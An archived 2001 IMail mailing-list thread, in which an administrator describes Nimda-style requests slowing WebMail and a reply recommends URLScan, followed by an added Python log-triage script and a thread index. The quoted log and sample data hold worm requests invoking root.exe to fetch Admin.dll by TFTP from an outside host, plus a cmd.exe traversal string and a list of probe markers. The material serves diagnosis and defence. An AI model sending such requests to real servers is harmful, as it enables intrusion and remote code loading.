Hello Charles, it's normal that the log tracks the Nimda attacks… To filter and reject the attacks, you must run the Microsoft tool URLScan on your IIS server: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/URLscan.asp

Read the urlscan.txt!!!

Good luck and best regards,
Guido Bunte
INFO.TEC Systems

-----Original Message-----

Hello,

I know this message is long, but I called Ipswitch Support twice on Wednesday about a problem I am having with my IMail Server and the phone support I have gotten has not addressed my issue here and I need all the help I can get right now. I am running 7.03 HF1 on NT4 Server with SP6a. I am only running IMail on this machine. No IIS or other server programs.

We started seeing problems on Tuesday like everyone else, but we are running IMail on a server by itself... No IIS. I am seeing a lot of malformed header requests in the logs like the Code Red I & II virus does to IIS servers and -- this is the odd part -- some BRO*.tmp files in my spool directory that are most definitely being caused by people browsing WebMail. It is causing web messaging to crawl, but other than that I have not seen what everyone else seems to be seeing with the Nimda virus. No other characteristics of the Nimda virus at all. I honestly do not believe that we have been infected...

Here is a snippet from the logs...

------------------------------
20010918 111401 208.180.242.21, , , GET /scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.dll HTTP/1.0

This seems to be a problem specific to IMail’s Web Messaging program not properly filtering out these malformed requests. When Web Messaging is off, the server runs like a dream. It is one thing to patch an IIS server with a patch from the product vendor, but I honestly don’t have a clue as to what else I can do to stop this DoS attack from happening on my IMail box without implementing a firewall system for that server. I am seeing a ton of incoming traffic in our T1 logs so I know that it is coming in from the outside, but what I need to know is what can I do to make IMail filter out these requests?

Help please…

Charles Short
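
A log-triage sketch for entries like the one quoted above, added here as an example and not part of the original thread or of IMail: it counts requests that name the worm's probe files per source IP, so the load can be separated from real WebMail traffic. The one-record-per-line layout, the marker list and every sample line after the first are assumptions constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Assumed layout, modeled on the snippet quoted in the message (one record per line):
#   YYYYMMDD HHMMSS <client ip>, , , <METHOD> <request target> HTTP/x.y
RECORD = re.compile(
    r"^(?P<date>\d{8}) (?P<time>\d{6}) (?P<ip>[\d.]+),[^,]*,[^,]*, "
    r"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$"
)

# root.exe and Admin.dll appear in the quoted entry; cmd.exe is an added assumption.
# A webmail-only server has no reason to serve any of them.
PROBE_MARKERS = ("root.exe", "cmd.exe", "admin.dll")

def is_worm_probe(target):
    """True if the percent-decoded request target names one of the probe files."""
    decoded = target
    for _ in range(3):  # undo nested encoding such as %255c -> %5c -> backslash
        decoded = unquote(decoded)
    return any(marker in decoded.lower() for marker in PROBE_MARKERS)

def summarize(lines):
    """Return (probe count per source IP, number of other requests, unparsed lines)."""
    probes, normal, unparsed = Counter(), 0, []
    for line in lines:
        m = RECORD.match(line.strip())
        if not m:
            unparsed.append(line)  # keep for manual review instead of dropping it
        elif is_worm_probe(m["target"]):
            probes[m["ip"]] += 1
        else:
            normal += 1
    return probes, normal, unparsed

# First line is the entry from the message; the rest are constructed sample data.
SAMPLE_LOG = [
    "20010918 111401 208.180.242.21, , , GET /scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.dll HTTP/1.0",
    "20010918 111402 208.180.242.21, , , GET /MSADC/root.exe?/c+dir HTTP/1.0",
    "20010918 111405 192.0.2.44, , , GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "20010918 111410 198.51.100.7, , , GET / HTTP/1.0",
    "20010918 111411 truncated record",
]

if __name__ == "__main__":
    probes, normal, unparsed = summarize(SAMPLE_LOG)
    for ip, count in probes.most_common():
        print(f"{ip}\t{count} probe request(s)")
    print(f"other requests: {normal}, unparsed lines: {len(unparsed)}")
```

The per-IP counts give a list of sources to block upstream of the mail server and a way to confirm that the slowdown tracks probe volume.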
- [imail] DoS Attack on IMail Web Messaging?? HELP! Charles Short
- Re: [imail] DoS Attack on IMail Web Messaging?? ... INFO.TEC Guido Bunte
- Re: [imail] DoS Attack on IMail Web Messaging?? ... Len Conrad
- Re: [imail] DoS Attack on IMail Web Messaging?? ... Scot Desort
- RE: [imail] DoS Attack on IMail Web Messaging?? ... Todd Carew
- Re: [imail] DoS Attack on IMail Web Messaging?? ... Scot Desort
- Re: [imail] DoS Attack on IMail Web Messaging?? ... Sheldon Koehler
- RE: [imail] DoS Attack on IMail Web Messagin... Ron Hornbaker
- Re: MISSING_REVERSE_DNS:Re: [imail] DoS Atta... R. Scott Perry
- Re: [imail] DoS Attack on IMail Web Messagin... Len Conrad
